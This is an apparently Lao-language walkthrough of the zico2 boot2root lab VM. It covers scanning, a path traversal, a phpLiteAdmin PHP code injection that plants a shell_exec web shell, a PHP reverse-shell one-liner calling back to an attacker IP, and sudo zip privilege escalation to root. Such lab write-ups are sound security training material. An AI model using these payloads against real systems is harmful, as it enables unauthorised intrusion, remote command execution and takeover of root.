ໃນບົດຄວາມນີ້ຜູ້ຂຽນຈະພາມາເບິ່ງວິທີຜ່ານໂຈດ zico2 ທີ່ຢູ່ໃນຮູບແບບ boot2root ຖ້າໃຜສົນໃຈ ຢາກລອງຫຼິ້ນເບິ່ງສາມາເຂົ້າໄປເບິ່ງໄດ້ທີ່ລິ້ງນີ້ເລີຍ
ເລີ່ມຈາກຂັ້ນຕອນທຳອິດກະຄືການຊອກຫາ ip ຂອງເຄື່ອງເປົ້າໝາຍວ່າເຄື່ອງເປົ້າໝາຍຈະຢູ່ທີ່ ip ໃດໃນວົງ network ຂອງເຮົາ, ໂດຍການໃຊ້ຄຳສັ່ງ
sudo netdiscover -i eth0 -r 192.168.100.0/24
ຈາກນີ້ເຮົາກໍຮູ້ແລ້ວວ່າ ip ເປົ້າໝາຍແມ່ນ 192.168.100.10.
ເມື່ອຮູ້ ip ເປົ້າໝາຍແລ້ວເຮົາກະມາທຳການສະແກນໂດຍໃຊ້ nmap ຄຳສັ່ງກໍຈະເປັນປະມານນີ້
nmap -T4 -p- -A 192.168.100.10
ຈາກການສະແກນຈະເຫັນວ່າມີ port ເປີດຢູ່ 4 port ກະຄື
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
34957/tcp open ເຫັນວ່າມີ port 80 ເປີດຢູ່ເມື່ອເຂົ້າໄປທີ່ເວັບເພຈກໍຈະມີໜ້າຕາປະມານນີ້
ຈາກທີ່ຫຼິ້ນຢູ່ກັບໜ້າເວັບໄປແປັບໜຶ່ງກະໄດ້ຄົ້ນພົບກັນໜ້າ url ນີ້
ກໍເລີຍລອງໃຊ້ nikto ເພື່ອສະແກນເບິ່ງວ່າມີຊ່ອງໂຫວ່ຫຍັງບໍ່, ແລ້ວກະໄດ້ອອກມາວ່າ
ຈະເຫັນວ່າມີຊ່ອງໂຫວ່ທີ່ເຮັດໃຫ້ເຮົາສາມາດເຂົ້າໄປເບິ່ງໄຟລທີ່ຢູ່ໃນເຄື່ອງທີ່ເປັນ host ໄດ້ໂດຍການໃສ່ ../../ແລ້ວຕາມດ້ວຍ path ທີ່ເຮົາຕ້ອງການ ເຊັນວ່າ ../../etc/passwd
ຈາກທີ່ຮູ້ແບບນັ້ນແລ້ວເຮົາກະລອງມາສະແກນຫາວ່າໃນເຄື່ອງນີ້ມີ directory ໃດແນ່ເຊື່ອງຢູ່
ໃນນີ້ກໍມີອັນໜຶ່ງທີ່ໜ້າສົນໃຈກໍຄື path dbadmin ເມື່ອເຂົ້າໄປຕາມ path ນີ້ກໍຈະໄດ້ໜ້ານີ້ຂຶ້ນມາ
ລອງ login ດ້ວຍ default password ກໍຄື admin ກໍຈະໄດ້ໜ້າ database admin ຂຶ້ນມາ
ເມື່ອເອົາ phpLiteAdmin v1.9.3 ໄປຄົ້ນຫາກເຫັນວ່າມີຊ່ວງໂຫວ່ Remote PHP Code Injection (https://www.exploit-db.com/exploits/24044).
ຊ່ອງໂຫວ່ນີ້ແມ່ນຈະເຮັດໃຫ້ເຮົາສາມາດຣັນ php code ເທິງເຄື່ອງນີ້ໄດ້ດ້ວຍວຶທີດັ່ງນີ້
1. ສ້າງ database ຂຶ້ນມາໃໝ່ ແລ້ວໃສ່ .php ຫຼື .sqlite ຕໍ່ທ້າຍ
2. Insert php code ເຂົ້າໄປໃນ text field
ໃນນີ້ແມ່ນຈະສ້າງ database ທີ່ຊື່ວ່າ friday.php ແລ້ວສ້າງ field ຊື່ test ແລ້ວໃສ່ value ເປັນ php code
<?php echo shell_exec($_GET[cmd]); ?>ຈາກນັ້ນກໍໃຊ້ຊ່ອງໂຫວ່ file traversal ໃນການທີ່ຈະ execute php code ໂຕນີ້ ກໍຄື
ຈາກນີ້ເຮົາກໍສາມາດຣັນ code ທີ່ເຮັດໃຫ້ເຮົາໄດ້ reverse shell ກັບມາ (Reverse Shell Cheat Sheet), ຄຳສັ່ງທີ່ໃຊ້ແມ່ນຈະເປັນ
php -r '$sock=fsockopen("Attacker ip",port);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'ກ່ອນທີ່ຈະຣັນຄຳສັ່ງນີ້ເຮົາກໍເປີດ port ຖ້າໃຫ້ເຄື່ອງເປົ້າໝາຍເຊື່ອມຕໍ່ເຂົ້າມາຫາເຄື່ອງເຮົາ ໂດຍການໃຊ້ nc -nvlp 4444 ຈາກນັ້ນກໍຣັນ php code ແລ້ວເຮົາກໍຈະໄດ້ shell ມາແລ້ວ
ເປົ້າໝາຍຕໍ່ໄປຂອງເຮົາຄືການຍົກສິດຈາກ user ທົ່ວໄປ ໄປເປັນ root.
ກ່ອນອື່ນກະມາເບິ່ງກ່ອນວ່າໃນເຄື່ອງນີ້ມີ user ໃດແນ່ເຊິ່ງຈາກທີ່ເຮົາເບິ່ງໄຟລ /etc/passwd ແລ້ວຈະເຫັນວ່າມີ user ຊື່ວ່າ zico ຢູ່.
ຈາກທີ່ສຳຫຼວດເບິ່ງໃນ directory zico ເບິ່ງກໍໄປພົບກັບ password ທີ່ຈະເຮັດໃຫ້ເຮົາປ່ຽນ user ເປັນ zico ໄດ້ password ແມ່ນຢູ່ໃນໄຟລ wp-config.php
ເມື່ອເຂົ້າມາເປັນ zico ແລ້ວກໍມາເບິ່ງເລີຍວ່າ zico ສາມາເຮັດຫຍັງກັບຄຳສັ່ງ sudo ໄດ້ແນ່
ຈາກນີ້ເຮົາກໍຮູ້ແລ້ວ່າ zico ສາມາດໃຊ້ຄຳສັ່ງ sudo ໄດ້ໂດຍທີ່ບໍ່ຕ້ອງການ root password ໃນການເອີ້ນໃຊ້ tar ແລະ zip
ໃນທີ່ນີ້ຜູ້ຂຽນຈະໃຊ້ zip ໃນການເຮັດໃຫ້ຕົວເອງເປັນ root
ໂດຍຄຳສັ່ງທີ່ໃຊ້ແມ່ນ
sudo zip 1.zip friday.txt -T --unzip-command="sh -c /bin/bash"ຖ້າໃຜຢາກຮູ້ວ່າມັນເຮັດວຽກແນວໃດກໍສາມາດໄປອ່ານໄດ້ທີ່ເວັບນີ້ເລີຍ https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation/
ຈາກນັ້ນເຮົາກໍຈະກາຍເປັນ root ແລ້ວກະໄປອ່ານເບິ່ງ flag ໄດ້ເລີຍ
